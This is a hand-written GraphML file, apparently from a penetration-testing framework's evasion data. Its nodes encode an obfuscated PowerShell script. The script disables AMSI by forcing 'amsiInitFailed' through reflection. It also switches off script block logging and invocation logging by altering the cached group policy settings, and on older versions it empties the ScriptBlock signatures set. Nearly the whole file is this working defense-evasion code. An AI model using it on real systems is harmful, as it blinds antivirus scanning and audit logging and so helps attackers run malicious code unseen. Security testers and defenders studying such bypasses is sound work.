data/evasion/windows/bypass_powershell_protections.erb.graphml
<?xml version="1.0" ?>
<!--
This file was generated by hand since no automated analysis and generation tool currently exists for Powershell code.
-->
<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:xsi="http://graphml.graphdrawing.org/xmlns" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd">
<key id="address" for="all" attr.name="address" attr.type="long"/>
<key id="type" for="all" attr.name="type" attr.type="string"/>
<key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
<key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
<graph edgedefault="directed">
<node id="block.1">
<data key="address">1</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">1</data>
<data key="type">block</data>
<node id="block.1:instruction.1">
<data key="address">1</data>
<data key="type">instruction</data>
<data key="instruction.source">If($PSVersionTable.PSVersion.Major -ge 3){</data>
</node>
<node id="block.1:instruction.2">
<data key="address">2</data>
<data key="type">instruction</data>
<data key="instruction.source"> $val=[Collections.Generic.Dictionary[string,System.Object]]::new();</data>
</node>
<node id="block.1:instruction.3">
<data key="address">3</data>
<data key="type">instruction</data>
<data key="instruction.source"> $Ref1=[Ref].Assembly.GetType(<%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.AmsiUtils', threshold: 0.3) %>);</data>
</node>
<node id="block.1:instruction.4">
<data key="address">4</data>
<data key="type">instruction</data>
<data key="instruction.source"> if ($Ref1) { $Ref1.GetField(<%= Rex::Powershell::Obfu.scate_string_literal('amsiInitFailed', threshold: 0.3) %>,'NonPublic,Static').SetValue($null,$true); };</data>
</node>
<node id="block.1:instruction.5">
<data key="address">5</data>
<data key="type">instruction</data>
<data key="instruction.source"> $Ref2=[Ref].Assembly.GetType(<%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.Utils') %>);</data>
</node>
<node id="block.1:instruction.6">
<data key="address">6</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPF=$Ref2.GetField('cachedGroupPolicySettings','NonPublic,Static');</data>
</node>
<node id="block.1:instruction.7">
<data key="address">7</data>
<data key="type">instruction</data>
<data key="instruction.source"> If ($GPF) {</data>
</node>
<node id="block.1:instruction.8">
<data key="address">8</data>
<data key="type">instruction</data>
<data key="instruction.source"> $SBL=<%= Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging') %>;</data>
</node>
<node id="block.1:instruction.9">
<data key="address">9</data>
<data key="type">instruction</data>
<data key="instruction.source"> $EnableSBL=<%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockLogging') %>;</data>
</node>
<node id="block.1:instruction.10">
<data key="address">10</data>
<data key="type">instruction</data>
<data key="instruction.source"> $EnableSBIL=<%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockInvocationLogging') %>;</data>
</node>
<node id="block.1:instruction.11">
<data key="address">11</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPC=$GPF.GetValue($null);</data>
</node>
<edge source="block.1:instruction.1" target="block.1:instruction.3"/>
<edge source="block.1:instruction.1" target="block.1:instruction.5"/>
<edge source="block.1:instruction.3" target="block.1:instruction.4"/>
<edge source="block.1:instruction.4" target="block.1:instruction.7"/>
<edge source="block.1:instruction.5" target="block.1:instruction.6"/>
<edge source="block.1:instruction.6" target="block.1:instruction.7"/>
<edge source="block.1:instruction.7" target="block.1:instruction.11"/>
</graph>
</node>
<node id="block.12">
<data key="address">12</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">12</data>
<data key="type">block</data>
<node id="block.12:instruction.12">
<data key="address">12</data>
<data key="type">instruction</data>
<data key="instruction.source"> If($GPC[$SBL]){</data>
</node>
<node id="block.12:instruction.13">
<data key="address">13</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPC[$SBL][$EnableSBL]=0;</data>
</node>
<node id="block.12:instruction.14">
<data key="address">14</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPC[$SBL][$EnableSBIL]=0;</data>
</node>
<node id="block.12:instruction.15">
<data key="address">15</data>
<data key="type">instruction</data>
<data key="instruction.source"> }</data>
</node>
<edge source="block.12:instruction.12" target="block.12:instruction.13"/>
<edge source="block.12:instruction.12" target="block.12:instruction.14"/>
<edge source="block.12:instruction.13" target="block.12:instruction.15"/>
<edge source="block.12:instruction.14" target="block.12:instruction.15"/>
</graph>
</node>
<node id="block.16">
<data key="address">16</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">16</data>
<data key="type">block</data>
<node id="block.16:instruction.16">
<data key="address">16</data>
<data key="type">instruction</data>
<data key="instruction.source"> $val.Add($EnableSBL,0);</data>
</node>
<node id="block.16:instruction.17">
<data key="address">17</data>
<data key="type">instruction</data>
<data key="instruction.source"> $val.Add($EnableSBIL,0);</data>
</node>
<node id="block.16:instruction.18">
<data key="address">18</data>
<data key="type">instruction</data>
<data key="instruction.source"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$SBL]=$val;</data>
</node>
<edge source="block.16:instruction.16" target="block.16:instruction.18"/>
<edge source="block.16:instruction.17" target="block.16:instruction.18"/>
</graph>
</node>
<node id="block.19">
<data key="address">19</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">19</data>
<data key="type">block</data>
<node id="block.19:instruction.19">
<data key="address">19</data>
<data key="type">instruction</data>
<data key="instruction.source"> } Else {</data>
</node>
<node id="block.19:instruction.20">
<data key="address">20</data>
<data key="type">instruction</data>
<data key="instruction.source"> [Ref].Assembly.GetType(<%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.ScriptBlock') %>).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]));</data>
</node>
<node id="block.19:instruction.21">
<data key="address">21</data>
<data key="type">instruction</data>
<data key="instruction.source"> }</data>
</node>
<node id="block.19:instruction.22">
<data key="address">22</data>
<data key="type">instruction</data>
<data key="instruction.source">};</data>
</node>
<edge source="block.19:instruction.19" target="block.19:instruction.20"/>
<edge source="block.19:instruction.20" target="block.19:instruction.21"/>
<edge source="block.19:instruction.21" target="block.19:instruction.22"/>
</graph>
</node>
<edge source="block.1" target="block.12"/>
<edge source="block.1" target="block.16"/>
<edge source="block.12" target="block.19"/>
<edge source="block.16" target="block.19"/>
</graph>
</graphml>